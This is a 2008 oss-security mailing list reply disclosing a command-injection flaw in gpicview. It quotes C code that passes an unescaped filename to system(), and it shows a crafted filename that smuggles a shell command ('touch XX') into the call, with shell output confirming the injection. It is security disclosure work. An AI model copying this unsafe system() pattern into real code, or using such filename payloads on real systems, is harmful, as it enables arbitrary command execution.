Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Wed, 3 Sep 2008 01:59:47 +0200
From: Robert Buchholz <rbu@...too.org>
To: oss-security@...ts.openwall.com
Subject: Re: CVE Request (gpicview)

On Sunday 31 August 2008, Nico Golde wrote:
> Same piece of code main-win.c doesn't look too trustworthy
> to me either:
>
>     690     int error = jpegtran (filename, "/tmp/rot.jpg" , code);
>     691     if(error)
>     692         return error;
>     693
>     694     //now copy /tmp/rot.jpg back to the original file
>     695     char command[strlen(filename)+50]; //this should not
> generate buffer owerflow 696     // MS: didn't know, how to make it
> better, maybe an own copy routine 697     sprintf(command,"cp
> /tmp/rot.jpg \"%s\"",filename); 698     system(command);
>
> Anyone played with crafted file names?

Good catch! You need to append '.jpg' at the end of the crafed filename 
so the rotation via jpegtran is invoked, but besides that it works ok:

rbu@...nut ~/devel/gentoo/security/gpicview $ ls -l
total 484K
-rw-------  1 rbu rbu 469K 2008-09-03 01:35 bla.jpg"; touch XX ;".jpg

rbu@...nut ~/devel/gentoo/security/gpicview $ gpicview *
QSettings: failed to open file '/usr/qt/3/etc/settings/qt_plugins_3.3rc'
sh: .jpg: command not found
^C

rbu@...nut ~/devel/gentoo/security/gpicview $ ls -l
total 960K
-rw-------  1 rbu rbu 469K 2008-09-03 01:52 bla.jpg
-rw-------  1 rbu rbu 469K 2008-09-03 01:35 bla.jpg"; touch XX ;".jpg
-rw-------  1 rbu rbu    0 2008-09-03 01:52 XX


Robert

[ CONTENT OF TYPE application/pgp-signature SKIPPED ]

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ